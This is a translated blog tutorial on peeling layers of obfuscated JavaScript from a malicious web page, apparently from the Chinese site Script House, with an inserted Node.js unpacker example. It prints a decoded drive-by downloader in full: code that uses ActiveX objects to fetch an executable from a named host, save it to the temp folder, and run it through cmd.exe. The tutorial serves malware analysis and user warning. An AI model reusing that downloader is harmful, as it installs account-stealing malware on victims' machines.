Original article; please credit the source when reprinting: Script House
I just discovered a reverse-thinking method for cracking various kinds of JavaScript encryption. If you have any good methods, please post them.
Recently I found some code that is encrypted in about 5 layers. I will crack it down to the last step without using a JavaScript decryption program.
List of software used
1. Xunlei (to download the web page): if you browse the page directly it will be executed, and the source code cannot be seen
2. Or use Firefox to browse the website directly. Because of Firefox's special nature, this browser is also recommended
1. Target URL http://www.e9ad.cn/pcdd/80-806.htm
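We use Xunlei (Thunder) to download this page, or browse it with Firefox, and get the following code
To decrypt this, let's analyze it.
Take a look at document.write(DFQC(42) DFQC(126).....
The DFQC in DFQC(42) is the decryption function: var DFQC=function(a){return String.fromCharCode(a^22)}
I have also worked out my decryption code below. This method can basically crack a lot of similar code; take a look at it.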
The decrypted code obtained is as follows:
<script>
function clear(){
    Source=document.body.firstChild.data;
    document.open();
    document.close();
    document.title="gg";
    document.body.innerHTML=Source;
}</script>
ad
<SCRIPT>
<!--
window.defaultStatus=" ";
//-->
</SCRIPT>
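2. Check the above http://www.e9ad.cn/pcdd/8080.htm and http://pop.*****.com/777/index.htm
I found that the page loaded by the iframe below is problematic, so
downloading the code of the page http://pop.*****.com/777/index.htm with a download tool reveals the following
The code is as follows: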
charset='gb2312'>
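Seeing this, you will probably recall the similar code that many websites use to sell traffic (this is exactly traffic selling)
3. Continue by analyzing http://cc.*****.com/wm/index.htm
Downloading this page with a download tool gives
OK, continuing: I downloaded the JS file http://cc.*****.com/wm/1.js and got this code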
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k
[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5
\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7
("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3
F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7
("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)
{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb
er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu
te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s
end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil
e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))
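Looking at the code above, you might think it cannot be decrypted. I searched and found that decryption code for it actually exists, and it could be analyzed that way, but the aim of this article is to avoid using a decryption program, so I use the method below.
I came up with this method after thinking for a few seconds. It had not occurred to me before, and from now on everyone can use it more conveniently.
First assign the code after eval to a variable with var str=......., then call document.write(str); this gives the following code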
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try
{dl='http://cc.*****.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute
("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject
("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject
("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var
F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder
(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile
(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath
(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}
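The step described above (take the argument of eval as a string instead of executing it), written for Node.js as an added example that is not the author's code. It goes one step further and peels nested layers in a loop; `unpackLayers`, `EVAL_WRAPPER` and `SAMPLE` are assumed names, and `SAMPLE` is a constructed, harmless string in the same packer format as 1.js.

```javascript
// Added example (Node.js); not code from the original article.
const vm = require('node:vm');

// Constructed, benign sample in the eval(function(p,a,c,k,e,d){...}) format.
const SAMPLE =
  String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+` +
  String.raw`((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};` +
  String.raw`if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);` +
  String.raw`k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};` +
  String.raw`while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}` +
  String.raw`('0 1="2";',3,3,'var|msg|hello'.split('|'),0,{}))`;

// Matches a source that consists of exactly one eval(<expression>) call.
const EVAL_WRAPPER = /^\s*eval\s*\(([\s\S]*)\)\s*;?\s*$/;

// Returns the decoded text of every layer, outermost first.
function unpackLayers(source, maxLayers = 10) {
  const layers = [];
  let current = source;
  for (let i = 0; i < maxLayers; i++) {
    const m = EVAL_WRAPPER.exec(current);
    if (!m) break; // no eval wrapper left to peel
    // Evaluate only the ARGUMENT of eval (the "var str = ..." trick);
    // the string it produces is stored, never executed.
    // The context is empty: no document, ActiveX, require or process.
    // The timeout stops a decoder that loops forever.
    const result = vm.runInNewContext('(' + m[1] + ')', {}, { timeout: 1000 });
    if (typeof result !== 'string') break; // not a string-producing decoder
    layers.push(result);
    current = result;
  }
  return layers;
}

console.log(unpackLayers(SAMPLE));
```

The decoder function itself still runs, and Node's vm module is not a security boundary, so real samples belong in a disposable analysis VM.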
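Then we can spot http://cc.*****.com/wm/mm.exe. Download it first; remember to check the size after downloading, since virus files are generally very small. First rename mm.exe to mm.exe.txt; opening it shows the following code. Sigh,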
<script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>
If your page does not jump automatically, please click here
See it? The most important thing is this: http://cc.*****.com/wm/mm.exe?QVyRR=au6BKUDmtn1
Then download it with a download tool; this is a virus file.
Finally finished. I found a virus; it should be an account-stealing Trojan horse. Nowadays there are a lot of traffic sellers online. Everyone who loves to play games, please pay attention.
Of course, the reverse-thinking method above can recover most encrypted JavaScript, and for many other schemes decryption programs exist.
If you have good methods, please post them so that everyone can make progress. Author: reterry QQ:461478385